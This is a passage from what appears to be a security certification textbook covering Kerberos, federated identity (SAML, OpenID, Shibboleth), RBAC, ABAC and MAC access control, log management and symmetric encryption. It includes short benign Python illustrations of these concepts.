when the principal needs to connect to another entity.
6. The TGS then transmits a ticket and session keys to the principal.
The set of principals for which a single KDC is responsible is
referred to as a realm.
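The following Python sketch compresses steps 1 through 6 into code
form. Every class and method name here is hypothetical, and the real
protocol exchanges encrypted, timestamped messages rather than plain
strings:

# Illustrative sketch of the Kerberos ticket flow; names are
# hypothetical and no cryptography is shown.
class KDC:
    def authenticate(self, client_id, credentials):
        # AS exchange: verify the principal's secret key, issue a TGT.
        return f"TGT-for-{client_id}"

    def grant_service_ticket(self, tgt, service):
        # TGS exchange: validate the TGT, issue a session ticket.
        return f"ticket-for-{service}", "session-key"

kdc = KDC()
tgt = kdc.authenticate("alice", credentials="alice-secret")
ticket, session_key = kdc.grant_service_ticket(tgt, "fileserver")
# Alice now presents the ticket (not her password) to the file server.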
Some advantages of implementing Kerberos include the
following:
User passwords do not need to be sent over the network.
Both the client and server authenticate each other.
The tickets passed between the server and client are timestamped
and include lifetime information.
The Kerberos protocol uses open Internet standards and is not
limited to proprietary codes or authentication mechanisms.
Some disadvantages of implementing Kerberos include the
following:
KDC redundancy is required if providing fault tolerance is a
requirement. The KDC is a single point of failure.
The KDC must be scalable to ensure that performance of the system
does not degrade.
Session keys on the client machines can be compromised.
Kerberos traffic needs to be encrypted to protect the information
over the network.
All systems participating in the Kerberos process must have
synchronized clocks.
Kerberos systems are susceptible to password-guessing attacks.
Figure 8-23 shows the Kerberos ticketing process.
Figure 8-23 Kerberos Ticket-Issuing Process
Active Directory
Microsoft’s implementation of SSO is Active Directory (AD),
which organizes directories into forests and trees. AD tools are
used to manage and organize everything in an organization,
including users and devices. This is where security is
implemented, and its implementation is made more efficient
through the use of Group Policy. AD is an example of a system
based on the Lightweight Directory Access Protocol (LDAP). It
uses the same authentication and authorization system used in
Unix and Kerberos. This system authenticates a user once and
then, through the use of a ticket system, allows the user to
perform all actions and access all resources to which she has
been given permission without the need to authenticate again.
The steps in this process are shown in Figure 8-24. The user
authenticates with the domain controller, which is performing
several other roles as well. First, it is the key distribution center
(KDC), which runs the authentication service (AS), which
determines whether the user has the right or permission to
access a remote service or resource in the network.
Figure 8-24 Kerberos Implementation in Active Directory
After the user has been authenticated (when she logs on once to
the network), she is issued a ticket-granting ticket (TGT). This is
used to later request session tickets, which are required to
access resources. At any point that she later attempts to access a
service or resource, she is redirected to the AS running on the
KDC. Upon presenting her TGT, she is issued a session, or
service, ticket for that resource. The user presents the service
ticket, which is signed by the KDC, to the resource server for
access. Because the resource server trusts the KDC, the user is
granted access.
SESAME
The Secure European System for Applications in a
Multivendor Environment (SESAME) project extended
Kerberos’s functionality to fix Kerberos’s weaknesses. SESAME
uses both symmetric and asymmetric cryptography to protect
interchanged data. SESAME uses a trusted authentication
server at each host. SESAME uses Privileged Attribute
Certificates (PACs) instead of tickets. It incorporates two
certificates: one for authentication and one for defining access
privileges. The trusted authentication server is referred to as the
Privileged Attribute Server (PAS), which performs roles similar
to the KDC in Kerberos. SESAME can be integrated into a
Kerberos system.
Federation
A federated identity is a portable identity that can be used
across businesses and domains. In federated identity
management, each organization that joins the federation agrees
to enforce a common set of policies and standards. These
policies and standards define how to provision and manage user
identification, authentication, and authorization. Providing
disparate authentication mechanisms with federated IDs has a
lower up-front development cost than other methods, such as a
PKI or attestation. Federated identity management uses two
basic models for linking organizations within the federation:
Cross-certification model: In this model, each organization
certifies that every other organization is trusted. This trust is
established when the organizations review each other’s standards.
Each organization must verify and certify through due diligence
that the other organizations meet or exceed standards. One
disadvantage of cross-certification is that the number of trust
relationships that must be managed can become problematic.
Trusted third-party (or bridge) model: In this model, each
organization subscribes to the standards of a third party. The third
party manages verification, certification, and due diligence for all
organizations. This is usually the best model for an organization
that needs to establish federated identity management relationships
with a large number of organizations.
Security issues with federations and their possible solutions
include the following:
Inconsistent security among partners: Federated partners
need to establish minimum standards for the policies, mechanisms,
and practices they use to secure their environments and
information.
Insufficient legal agreements among partners: Like any
other business partnership, identity federation requires carefully
drafted legal agreements.
A number of methods are used to securely transmit
authentication data among partners. The following sections
look at these protocols and services.
XACML
Extensible Access Control Markup Language (XACML) is a
standard for an access control policy language using XML. It is
covered in Chapter 7, “Implementing Controls to Mitigate
Attacks and Software Vulnerabilities.”
SPML
Another open standard for exchanging authorization
information between cooperating organizations is Service
Provisioning Markup Language (SPML). It is an XML-based framework developed by the Organization for the
Advancement of Structured Information Standards (OASIS),
which is a nonprofit, international consortium that creates
interoperable industry specifications based on public standards
such as XML and SGML. The SPML architecture has three
components:
Request authority (RA): The entity that makes the provisioning
request
Provisioning service provider (PSP): The entity that responds
to the RA requests
Provisioning service target (PST): The entity that performs the
provisioning
When a trust relationship has been established between two
organizations with web-based services, one organization acts as
the RA and the other acts as the PSP. The trust relationship uses
Security Assertion Markup Language (SAML), discussed next,
in a Simple Object Access Protocol (SOAP) header. The SOAP
body transports the SPML requests/responses.
Figure 8-25 shows an example of how these SPML messages are
used. In the diagram, a company has an agreement with a
supplier to allow the supplier to access its provisioning system.
When the supplier’s HR department adds a user, an SPML
request is generated to the supplier’s provisioning system so the
new user can use the system. Then the supplier’s provisioning
system generates another SPML request to create the account in
the customer provisioning system.
Figure 8-25 SPML
SAML
Security Assertion Markup Language (SAML) is a
security attestation model built on XML and SOAP-based
services that allows for the exchange of authentication and
authorization data between systems and supports federated
identity management. The major issue it attempts to address is
SSO using a web browser. When authenticating over HTTP
using SAML, an assertion ticket is issued to the authenticating
user.
Remember that SSO enables a user to authenticate once to
access multiple sets of data. SSO at the Internet level is usually
accomplished with cookies, but extending the concept beyond
the Internet has resulted in many proprietary approaches that
are not interoperable. The goal of SAML is to create a standard
for this process.
A consortium called the Liberty Alliance proposed an extension
to the SAML standard called the Liberty Identity Federation
Framework (ID-FF), intended to be a standardized
cross-domain SSO framework. It identifies a circle of trust,
within which each participating domain is trusted to document
the following about each user:
The process used to identify a user
The type of authentication system used
Any policies associated with the resulting authentication credential
Each member entity is free to examine this information and
determine whether to trust it. Liberty contributed ID-FF to
OASIS. In March 2005, SAML v2.0 was announced as an OASIS
standard. SAML v2.0 represents the convergence of Liberty ID-FF and other proprietary extensions.
In an unauthenticated SAMLv2 transaction, the browser asks
the service provider (SP) for a resource. The SP provides the
browser with an XHTML form. The browser asks the identity
provider (IP) to validate the user and then provides the XHTML
form back to the SP for access. The <NameID> element in SAML can
be provided as the X.509 subject name or the Kerberos principal
name.
To prevent a third party from identifying a specific user as
having previously accessed a service provider through an SSO
operation, SAML uses transient identifiers (which are valid only
for a single login session and are different each time the user
authenticates again but stay the same as long as the user is
authenticated).
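To show what a transient identifier looks like in practice, here is a
minimal, unsigned skeleton of a SAML 2.0 assertion built with Python's
standard library. The element names follow the SAML 2.0 schema, but
the assertion is illustrative only; real assertions are signed and
carry many more elements:

# Minimal, unsigned skeleton of a SAML 2.0 assertion with a transient
# NameID, built with the standard library for illustration only.
import uuid
import xml.etree.ElementTree as ET

NS = "urn:oasis:names:tc:SAML:2.0:assertion"
assertion = ET.Element(f"{{{NS}}}Assertion", ID=f"_{uuid.uuid4().hex}")
name_id = ET.SubElement(
    ET.SubElement(assertion, f"{{{NS}}}Subject"),
    f"{{{NS}}}NameID",
    Format="urn:oasis:names:tc:SAML:2.0:nameid-format:transient",
)
# The transient value is random per login session, so a third party
# cannot correlate the user across sessions.
name_id.text = uuid.uuid4().hex

print(ET.tostring(assertion, encoding="unicode"))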
SAML is a good solution in the following scenarios:
When you need to provide SSO (when at least one actor or
participant is an enterprise)
When you need to provide access to a partner or customer
application to your portal
When you can provide a centralized identity source
OpenID
OpenID is an open standard and decentralized protocol by the
nonprofit OpenID Foundation that allows users to be
authenticated by certain cooperating sites. The cooperating sites
are called relying parties (RPs). OpenID allows users to log in to
multiple sites without having to register their information
repeatedly. Users select an OpenID identity provider and use
the accounts to log in to any website that accepts OpenID
authentication.
While OpenID solves the same issue as SAML, an enterprise
may find these advantages in using OpenID:
It’s less complex than SAML.
It’s been widely adopted by companies such as Google.
On the other hand, you should be aware of the following
shortcomings of OpenID compared to SAML:
With OpenID, auto-discovery of the identity provider must be
configured per user.
SAML has better performance.
SAML can initiate SSO from either the service provider or the
identity provider, while OpenID can only be initiated from the
service provider.
In February 2014, the third generation of OpenID, called
OpenID Connect, was released. It is an authentication layer
protocol that resides atop the OAuth 2.0 framework. It is
designed to support native and mobile applications, and it
defines methods of signing and encryption.
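Because OpenID Connect ID tokens are signed JWTs, a relying party
typically validates them with a JWT library. The following sketch uses
the third-party PyJWT package (an assumption; any JWT library works),
and the issuer, audience, and key values are placeholders:

# Sketch of relying-party ID token validation with the PyJWT package
# (third-party; pip install pyjwt). All values are placeholders.
import jwt

def validate_id_token(id_token, issuer_public_key):
    claims = jwt.decode(
        id_token,
        issuer_public_key,
        algorithms=["RS256"],            # reject unsigned tokens
        audience="my-client-id",         # must match our registration
        issuer="https://id.example.com", # must match the provider
    )
    return claims["sub"]  # the provider's identifier for the user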
Here is an example of SAML in action:
1. A user logs in to Domain A, using a PKI certificate that is stored on
a smart card protected by an eight-digit PIN.
2. The credential is cached by the authenticating server in Domain A.
3. Later, the user attempts to access a resource in Domain B. This
initiates a request to the Domain A authenticating server to attest to
the resource server in Domain B that the user is in fact who she
claims to be.
Figure 8-26 illustrates the way the service provider obtains the
identity information from the identity provider.
Figure 8-26 SAML
Shibboleth
Shibboleth is an open source project that provides single sign-on capabilities and allows sites to make informed authorization
decisions for individual access of protected online resources in a
privacy-preserving manner. Shibboleth allows the use of
common credentials among sites that are a part of the
federation. It is based on SAML. This system has two
components:
Identity providers: IPs supply the user information.
Service providers: SPs consume this information before
providing a service.
Role-Based Access Control
Role-based access control (RBAC) is commonly used in
networks to simplify the process of assigning new users the
permission required to perform a job role. In this arrangement,
users are organized by job role into security groups, which are
then granted the rights and permissions required to perform
that job. Figure 8-27 illustrates this process. The role is
implemented as a security group possessing the required rights
and permissions, which are inherited by all security group or
role members.
Figure 8-27 RBAC
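A minimal Python sketch of the arrangement in Figure 8-27, with
hypothetical roles and permissions: users hold roles, and rights are
checked only through role membership:

# Minimal RBAC sketch: permissions attach to roles; users inherit
# permissions only through role membership. Names are illustrative.
ROLE_PERMISSIONS = {
    "helpdesk": {"reset_password", "read_tickets"},
    "webdev":   {"deploy_site", "read_logs"},
    "dba":      {"backup_db", "restore_db"},
}
USER_ROLES = {"sally": {"helpdesk"}, "juan": {"webdev", "dba"}}

def is_authorized(user, permission):
    return any(permission in ROLE_PERMISSIONS[role]
               for role in USER_ROLES.get(user, set()))

print(is_authorized("sally", "deploy_site"))  # False
print(is_authorized("juan", "backup_db"))     # True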
This is not a perfect solution, however, and it carries several
security issues. First, RBAC is only as successful as the
organization policies designed to support it. Poor policies can
result in the proliferation of unnecessary roles, creating an
administrative nightmare for the person managing user access.
This can lead to mistakes that reduce rather than enhance
access security.
A related issue is that those managing user access may have an
incomplete understanding of the process, and this can lead to a
serious reduction in security. There can be additional costs to
the organization to ensure proper training of these individuals.
The key to making RBAC successful is proper alignment with
policies and proper training of those implementing and
maintaining the system.
Note
A security issue can be created when a user is fired or quits. In both cases, all
access should be removed. Account reviews should be performed on a regular
basis to catch any old accounts that are still active.
Attribute-Based Access Control
Attribute-based access control (ABAC) grants or denies
user requests based on arbitrary attributes of the user and
arbitrary attributes of the object, and environment conditions
that may be globally recognized. NIST SP 800-162 was
published to define and clarify ABAC.
According to NIST SP 800-162, ABAC is an access control
method where subject requests to perform operations on objects
are granted or denied based on assigned attributes of the
subject, assigned attributes of the object, environment
conditions, and a set of policies that are specified in terms of
those attributes and conditions. An operation is the execution
of a function at the request of a subject upon an object.
Operations include read, write, edit, delete, copy, execute, and
modify. A policy is the representation of rules or relationships
that makes it possible to determine if a requested access should
be allowed, given the values of the attributes of the subject,
object, and possibly environment conditions. Environment
conditions are the operational or situational context in which
access requests occur. Environment conditions are detectable
environmental characteristics, which are independent of subject
or object, and may include the current time, day of the week,
location of a user, or the current threat level.
Figure 8-28 shows a basic ABAC scenario according to NIST SP
800-162.
Figure 8-28 NIST SP 800-162 Basic ABAC Scenario
As specified in NIST SP 800-162, there are characteristics or
attributes of a subject such as name, date of birth, home
address, training record, and job function that may, either
individually or when combined, comprise a unique identity that
distinguishes that person from all others. These characteristics
are often called subject attributes.
Like subjects, each object has a set of attributes that help
describe and identify it. These traits are called object attributes
(sometimes referred to as resource attributes). Object attributes
are typically bound to their objects through reference, by
embedding them within the object, or through some other
means of assured association such as cryptographic binding.
ACLs and RBAC are in some ways special cases of ABAC in
terms of the attributes used. ACLs work on the attribute of
“identity.” RBAC works on the attribute of “role.” The key
difference with ABAC is the concept of policies that express a
complex Boolean rule set that can evaluate many different
attributes. While it is possible to achieve ABAC objectives using
ACLs or RBAC, demonstrating access control requirements
compliance is difficult and costly due to the level of abstraction
required between the access control requirements and the ACL
or RBAC model. Another problem with ACL or RBAC models is
that if the access control requirement is changed, it may be
difficult to identify all the places where the ACL or RBAC
implementation needs to be updated.
ABAC relies upon the assignment of attributes to subjects and
objects, and the development of policy that contains the access
rules. Each object within the system must be assigned specific
object attributes that characterize the object. Some attributes
pertain to the entire instance of an object, such as the owner.
Other attributes may only apply to parts of the object.
Each subject that uses the system must be assigned specific
attributes. Every object within the system must have at least one
policy that defines the access rules for the allowable subjects,
operations, and environment conditions to the object. This
policy is normally derived from documented or procedural rules
that describe the business processes and allowable actions
within the organization. The rules that bind subject and object
attributes indirectly specify privileges (i.e., which subjects can
perform which operations on which objects). Allowable
operation rules can be expressed through many forms of
computational language such as
A Boolean combination of attributes and conditions that satisfies
the authorization for a specific operation
A set of relations associating subject and object attributes and
allowable operations
Once object attributes, subject attributes, and policies are
established, objects can be protected using ABAC. Access
control mechanisms mediate access to the objects by limiting
access to allowable operations by allowable subjects. The access
control mechanism assembles the policy, subject attributes, and
object attributes, then renders and enforces a decision based on
the logic provided in the policy. Access control mechanisms
must be able to manage the process required to make and
enforce the decision, including determining what policy to
retrieve, which attributes to retrieve in what order, and where to
retrieve attributes. The access control mechanism must then
perform the computation necessary to render a decision.
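The following Python sketch shows a single hypothetical ABAC policy
expressed as a Boolean rule over subject, object, and environment
attributes, in the spirit of NIST SP 800-162. All attribute names are
illustrative:

# Sketch of an ABAC decision: a policy is a Boolean rule over subject,
# object, and environment attributes.
from datetime import time

def policy(subject, obj, env):
    return (
        subject["department"] == obj["owning_department"]
        and subject["training_current"]
        and time(8, 0) <= env["current_time"] <= time(18, 0)  # hours
        and env["threat_level"] < 3
    )

subject = {"department": "finance", "training_current": True}
obj = {"owning_department": "finance"}
env = {"current_time": time(10, 30), "threat_level": 1}
print("Permit" if policy(subject, obj, env) else "Deny")  # Permit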
The policies that can be implemented in an ABAC model are
limited only to the degree imposed by the computational
language and the richness of the available attributes. This
flexibility enables the greatest breadth of subjects to access the
greatest breadth of objects without having to specify individual
relationships between each subject and each object.
While ABAC is an enabler of information sharing, the set of
components required to implement ABAC gets more complex
when deployed across an enterprise. At the enterprise level, the
increased scale requires complex and sometimes independently
established management capabilities necessary to ensure
consistent sharing and use of policies and attributes and the
controlled distribution and employment of access control
mechanisms throughout the enterprise.
Mandatory Access Control
In mandatory access control (MAC), subject authorization
is based on security labels. MAC is often described as
prohibitive because it is based on a security label system. Under
MAC, all that is not expressly permitted is forbidden. Only
administrators can change the category of a resource.
Because of the importance of security in MAC, labeling is
required. Data classification reflects the data’s sensitivity. In a
MAC system, a clearance is a privilege to access a class of items
that are organized by sensitivity. Each subject and object is
given a security or sensitivity label. The security labels are
hierarchical. For commercial organizations, the levels of
security labels could be confidential, proprietary, corporate,
sensitive, and public. For government or military institutions,
the levels of security labels could be top secret, secret,
confidential, and unclassified.
In MAC, the system makes access decisions when it compares a
subject’s clearance level with an object’s security label. MAC
access systems operate in different security modes at various
times, based on variables such as sensitivity of data, the
clearance level of the user, and the actions the user is authorized
to take. These security modes are as follows:
Dedicated security mode: A system is operating in dedicated
security mode if it employs a single classification level. In this
system, all users can access all data, but they must sign a
nondisclosure agreement (NDA) and be formally approved for
access on a need-to-know basis.
System high security mode: In a system operating in system
high security mode, all users have the same security clearance (as in
the dedicated security mode), but they do not all possess a need-to-know clearance for all the information in the system. Consequently,
although a user might have clearance to access an object, she still
might be restricted if she does not have need-to-know clearance
pertaining to the object.
Compartmented security mode: In a compartmented security
mode system, all users must possess the highest security clearance
(as in both dedicated and system high security modes), but they
must also have valid need-to-know clearance, a signed NDA, and
formal approval for all information to which they have access. The
objective is to ensure that the minimum number of people possible
have access to information at each level or compartment.
Multilevel security mode: When a system allows two or more
classification levels of information to be processed at the same time,
it is said to be operating in multilevel security mode. Users must
have a signed NDA for all the information in the system and have
access to subsets based on their clearance level and need-to-know
and formal access approval. These systems involve the highest risk
because information is processed at more than one level of security,
even when all system users do not have appropriate clearances or a
need-to-know for all information processed by the system. This is
also sometimes called controlled security mode.
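To make the clearance-versus-label comparison concrete, here is a toy
Python sketch of a MAC-style read check that also enforces need-to-know
through compartments. The levels and compartments are illustrative:

# Sketch of a MAC-style check: the system compares a hierarchical
# clearance against an object's label and enforces need-to-know.
LEVELS = {"unclassified": 0, "confidential": 1, "secret": 2,
          "top secret": 3}

def can_read(clearance, label, need_to_know, object_compartment):
    # Clearance must dominate the label AND need-to-know must hold.
    return (LEVELS[clearance] >= LEVELS[label]
            and object_compartment in need_to_know)

print(can_read("secret", "confidential", {"ops"}, "ops"))  # True
print(can_read("secret", "top secret", {"ops"}, "ops"))    # False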
Manual Review
Users who have been assigned privileged accounts have been
given the right to do things that could cause issues. Privileged
accounts, regardless of the authentication method or
architecture, must be monitored to ensure that these additional
rights are not abused.
While there are products that automate the audit of privileged
accounts, if all else fails a manual review must be done on a
regular basis. This task should not be placed in the “when we
have time” category. There’s never time.
CLOUD ACCESS SECURITY BROKER
(CASB)
A cloud security broker, or cloud access security broker
(CASB), is a software layer that operates as a gatekeeper
between an organization’s on-premises network and the
provider’s cloud environment. It can provide many services in
this strategic position, as shown in Figure 8-29. Vendors in the
CASB market include McAfee and Netskope.
Figure 8-29 CASB
HONEYPOT
Honeypots are systems that are configured to be attractive to
hackers and lure them into spending time attacking them while
information is gathered about the attack. In some cases entire
networks called honeynets are attractively configured for this
purpose. These types of approaches should only be undertaken
by companies with the skill to properly deploy and monitor
them.
Care should be taken that the honeypots and honeynets do not
provide direct connections to any important systems. This
prevents them from serving as a jumping-off point to other areas of the
network. The ultimate purpose of these systems is to divert
attention from more valuable resources and to gather as much
information about an attack as possible. A tarpit is a type of
honeypot designed to provide a very slow connection to the
hacker so that the attack can be analyzed.
MONITORING AND LOGGING
Monitoring and monitoring tools will be discussed in much
more depth in several subsequent chapters, but it is important
that we talk here about logging and monitoring in the context of
infrastructure management.
Log Management
Typically, system, network, and security administrators are
responsible for managing logging on their systems, performing
regular analysis of their log data, documenting and reporting
the results of their log management activities, and ensuring that
log data is provided to the log management infrastructure in
accordance with the organization’s policies. In addition, some of
the organization’s security administrators act as log
management infrastructure administrators, with
responsibilities such as the following:
Contact system-level administrators to get additional information
regarding an event or to request investigation of a particular event.
Identify changes needed to system logging configurations (for
example, which entries and data fields are sent to the centralized
log servers, what log format should be used) and inform system-level administrators of the necessary changes.
Initiate responses to events, including incident handling and
operational problems (for example, a failure of a log management
infrastructure component).
Ensure that old log data is archived to removable media and
disposed of properly when it is no longer needed.
Cooperate with requests from legal counsel, auditors, and others.
Monitor the status of the log management infrastructure (for
example, failures in logging software or log archival media, failures
of local systems to transfer their log data) and initiate appropriate
responses when problems occur.
Test and implement upgrades and updates to the log management
infrastructure’s components.
Maintain the security of the log management infrastructure.
Organizations should develop policies that clearly define
mandatory requirements and suggested recommendations for
several aspects of log management, including the following: log
generation, log transmission, log storage and disposal, and log
analysis. Table 8-3 provides examples of logging configuration
settings that an organization can use. The types of values
defined in Table 8-3 should only be applied to the hosts and
host components previously specified by the organization as
ones that must or should be logging security-related events.
Table 8-3 Examples of Logging Configuration Settings

Category                      Low-Impact System           Moderate-Impact System    High-Impact System
Log retention duration        1–2 weeks                   1–3 months                3–12 months
Log rotation                  Optional (if performed, at  Every 6–24 hours, or      Every 15–60 minutes, or
                              least every week or every   every 2–5 MB              every 0.5–1.0 MB
                              25 MB)
Log data transfer frequency   Every 3–24 hours            Every 15–60 minutes       At least every 5 minutes
(to SIEM)
Local log data analysis       Every 1–7 days              Every 12–24 hours         At least 6 times a day
File integrity check for      Optional                    Yes                       Yes
rotated logs?
Encrypt rotated logs?         Optional                    Optional                  Yes
Encrypt log data transfers    Optional                    Yes                       Yes
to SIEM?
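As one illustration of the rotation values in Table 8-3, a
moderate-impact host might rotate a log every few megabytes. The
following sketch uses Python's standard logging module; the file name
and retention count are placeholders:

# Sketch: size-based log rotation in the moderate-impact range of
# Table 8-3 (rotate at about 5 MB), using only the standard library.
import logging
from logging.handlers import RotatingFileHandler

handler = RotatingFileHandler(
    "app-security.log",
    maxBytes=5 * 1024 * 1024,  # rotate at 5 MB
    backupCount=90,            # keep rotated files for retention
)
logger = logging.getLogger("security")
logger.addHandler(handler)
logger.warning("example security-related event")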
Audit Reduction Tools
Audit reduction tools are preprocessors designed to reduce the
volume of audit records to facilitate manual review. They are
discussed in Chapter 7.
NIST SP 800-137
According to NIST SP 800-137, information security continuous
monitoring (ISCM) is defined as maintaining ongoing
awareness of information security, vulnerabilities, and threats
to support organizational risk management decisions.
Organizations should take the following steps to establish,
implement, and maintain ISCM:
1. Define an ISCM strategy based on risk tolerance that maintains
clear visibility into assets, awareness of vulnerabilities, up-to-date
threat information, and mission/business impacts.
2. Establish an ISCM program that includes metrics, status
monitoring frequencies, control assessment frequencies, and an
ISCM technical architecture.
3. Implement an ISCM program and collect the security-related
information required for metrics, assessments, and reporting.
Automate collection, analysis, and reporting of data where possible.
4. Analyze the data collected, report findings, and determine the
appropriate responses. It may be necessary to collect additional
information to clarify or supplement existing monitoring data.
5. Respond to findings with technical, management, and operational
mitigating activities or acceptance, transference/sharing, or
avoidance/rejection.
6. Review and update the monitoring program, adjusting the ISCM
strategy and maturing measurement capabilities to increase
visibility into assets and awareness of vulnerabilities, further enable
data-driven control of the security of an organization’s information
infrastructure, and increase organizational resilience.
ENCRYPTION
Protecting information with cryptography involves the
deployment of a cryptosystem. A cryptosystem consists of
software, protocols, algorithms, and keys. The strength of any
cryptosystem comes from the algorithm and the length and
secrecy of the key. For example, one method of making a
cryptographic key more resistant to exhaustive attacks is to
increase the key length. If the cryptosystem uses a weak key, it
facilitates attacks against the algorithm.
While a cryptosystem supports the three core principles of the
confidentiality, integrity, and availability (CIA) triad,
cryptosystems directly provide authentication, confidentiality,
integrity, authorization, and non-repudiation. The availability
tenet of the CIA triad is supported only indirectly: cryptography
helps protect an organization's data but does not by itself ensure
that the data remains available. Security services provided by
cryptosystems include the following:
Authentication: Cryptosystems provide authentication by being
able to determine the sender’s identity and validity. Digital
signatures verify the sender’s identity. Protecting the key ensures
that only valid users can properly encrypt and decrypt the message.
Confidentiality: Cryptosystems provide confidentiality by altering
the original data in such a way as to ensure that the data cannot be
read except by the valid recipient. Without the proper key,
unauthorized users are unable to read the message.
Integrity: Cryptosystems provide integrity by allowing valid
recipients to verify that data has not been altered. Hash functions
do not prevent data alteration but provide a means to determine
whether data alteration has occurred (see the sketch after this
list).
Authorization: Cryptosystems provide authorization by providing
the key to a valid user after that user proves his identity through
authentication. The key given to the user allows the user to access a
resource.
Non-repudiation: Non-repudiation in cryptosystems provides
proof of the origin of data, thereby preventing the sender from
denying that he sent the message and supporting data integrity.
Public key cryptography and digital signatures provide non-repudiation.
Key management: Key management in cryptography is essential
to ensure that the cryptography provides confidentiality, integrity,
and authentication. If a key is compromised, it can have serious
consequences throughout an organization.
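Here is the hash sketch referenced in the integrity item: the recipient
recomputes a SHA-256 digest and compares it to the one supplied by the
sender. The messages are illustrative:

# Integrity check sketch: compare a SHA-256 digest computed by the
# sender with one recomputed by the recipient.
import hashlib

message = b"transfer $100 to account 42"
sent_digest = hashlib.sha256(message).hexdigest()

received = b"transfer $900 to account 42"  # altered in transit
if hashlib.sha256(received).hexdigest() != sent_digest:
    print("Integrity check failed: data was altered")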
Cryptographic Types
Algorithms that are used in computer systems implement
complex mathematical formulas when converting plaintext to
ciphertext. The two main components to any encryption system
are the key and the algorithm. In some encryption systems, the
two communicating parties use the same key. In other
encryption systems, the two communicating parties use
different keys in the process, but the keys are related. This
section discusses symmetric algorithms and asymmetric
algorithms.
Symmetric Algorithms
Symmetric algorithms use a private or secret key that must
remain secret between the two parties. Each party pair requires
a separate private key. Therefore, a single user would need a
unique secret key for every user with whom she communicates.
Consider an example where there are 10 unique users. Each
user needs a separate private key to communicate with the other
users. To calculate the number of keys that would be needed in
this example, you would use the following formula:
number of users × (number of users – 1) / 2
Therefore, in this example, you would calculate 10 × (10 – 1) / 2
= 45 needed keys.
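The same arithmetic in a few lines of Python, which also shows how
quickly the key count grows:

# Number of pairwise symmetric keys for n users: n * (n - 1) / 2
def keys_needed(n):
    return n * (n - 1) // 2

print(keys_needed(10))   # 45
print(keys_needed(100))  # 4950; key management scales poorly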
With symmetric algorithms, the encryption key must remain
secure. To obtain the secret key, the users must find a secure
out-of-band method for communicating the secret key,
such as courier or direct physical contact between the users. A
special type of symmetric key called a session key encrypts
messages between two users during one communication
session. Symmetric algorithms can be referred to as single-key,
secret-key, private-key, or shared-key cryptography. Symmetric
systems provide confidentiality but not authentication or non-repudiation. If both users use the same key, determining where
the message originated is impossible. Symmetric algorithms
include AES, IDEA, Blowfish, Twofish, RC4/RC5/RC6, and
CAST. Table 8-4 lists the strengths and weaknesses of
symmetric algorithms.
Table 8-4 Symmetric Algorithm Strengths and Weaknesses

Strengths:
Symmetric algorithms are 1000 to 10,000 times faster than asymmetric
algorithms.
They are hard to break.
They are cheaper to implement than asymmetric algorithms.

Weaknesses:
The number of unique keys needed can cause key management issues.
Secure key distribution is critical.
Key compromise occurs if one party is compromised, thereby allowing
impersonation.
The two broad types of symmetric algorithms are stream-based
ciphers and block ciphers. Initialization vectors (IVs) are an
important part of block ciphers. These three components are
discussed next.
Stream-based Ciphers
Stream-based ciphers perform encryption on a bit-by-bit
basis and use keystream generators. The keystream generators
create a bit stream that is XORed with the plaintext bits. The
result of this XOR operation is the ciphertext.
A synchronous stream-based cipher generates its keystream from the key alone, whereas an asynchronous (self-synchronizing) stream cipher generates its keystream from the key and previous ciphertext. The key ensures that the bit stream that is XORed with the plaintext is effectively random.
Advantages of stream-based ciphers include the following:
They generally have lower error propagation because encryption
occurs on each bit.
They are generally used more in hardware implementations.
They use the same key for encryption and decryption.
They are generally cheaper to implement than block ciphers.
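To make the keystream idea concrete, here is a toy Python sketch of the XOR operation at the heart of a stream cipher. It is for illustration only and is not a secure cipher; a real keystream generator derives its output from the key.

import os

def xor_keystream(data: bytes, keystream: bytes) -> bytes:
    # XOR each byte of the data with the corresponding keystream byte.
    return bytes(d ^ k for d, k in zip(data, keystream))

keystream = os.urandom(16)  # stand-in for a key-driven keystream generator
plaintext = b"attack at dawn!!"
ciphertext = xor_keystream(plaintext, keystream)

# The same keystream (same key) both encrypts and decrypts.
assert xor_keystream(ciphertext, keystream) == plaintext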
Block Ciphers
Block ciphers perform encryption by breaking the message
into fixed-length units. A message of 1024 bits could be divided
into 16 blocks of 64 bits each. Each of those 16 blocks is
processed by the algorithm formulas, resulting in a single block
of ciphertext. Examples of block ciphers include IDEA,
Blowfish, RC5, and RC6.
Advantages of block ciphers include the following:
Implementation of block ciphers is easier than stream-based cipher
implementation.
They are generally less susceptible to security issues.
They are generally used more in software implementations.
Table 8-5 lists the key facts about each symmetric algorithm.
Table 8-5 Symmetric Algorithms Key Facts

Algorithm Name | Block or Stream Cipher? | Key Size | Number of Rounds | Block Size
3DES | Block | 56, 112, or 168 bits | 48 | 64 bits
AES | Block | 128, 192, or 256 bits | 10, 12, or 14 (depending on block/key size) | 128, 192, or 256 bits
IDEA | Block | 128 bits | 8 | 64 bits
Blowfish | Block | 32–448 bits | 16 | 64 bits
Twofish | Block | 128, 192, or 256 bits | 16 | 128 bits
RC4 | Stream | 40 to 2048 bits | Up to 256 | N/A
RC5 | Block | Up to 2048 bits | Up to 255 | 32, 64, or 128 bits
RC6 | Block | Up to 2048 bits | Up to 255 | 32, 64, or 128 bits
The block ciphers mentioned earlier use initialization vectors
(IVs) to ensure that patterns are not produced during
encryption. These IVs provide this service by using random
values with the algorithms. Without using IVs, a repeated
phrase within a plaintext message could result in the same
ciphertext. Attackers can possibly use these patterns to break
the encryption.
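The effect of an IV can be demonstrated with a short sketch, assuming the third-party cryptography package (pip install cryptography):

import os
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

key = os.urandom(32)  # 256-bit AES key
iv = os.urandom(16)   # random IV, generated fresh for each encryption

# Encrypt two identical 128-bit plaintext blocks in CBC mode.
encryptor = Cipher(algorithms.AES(key), modes.CBC(iv)).encryptor()
block = b"sixteen byte msg"
ciphertext = encryptor.update(block * 2) + encryptor.finalize()

# Because each block is chained to the IV or the previous ciphertext block,
# the identical plaintext blocks produce different ciphertext blocks.
assert ciphertext[:16] != ciphertext[16:32]

In a mode with no IV or chaining (such as ECB), the two identical plaintext blocks would encrypt to identical ciphertext blocks, producing exactly the patterns an attacker can exploit.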
Asymmetric Algorithms
Asymmetric algorithms use both a public key and a private
or secret key. The public key is known by all parties, and the
private key is known only by its owner. One of these keys
encrypts the message, and the other decrypts the message.
(Asymmetric algorithms are also referred to as dual-key or
public-key cryptography.)
In asymmetric cryptography, determining a user’s private key is
virtually impossible even if the public key is known, although
both keys are mathematically related. However, if a user’s
private key is discovered, the system can be compromised.
Asymmetric systems provide confidentiality, integrity,
authentication, and non-repudiation. Because both users have
one unique key that is part of the process, determining where
the message originated is possible. If confidentiality is the
primary concern for an organization, a message should be
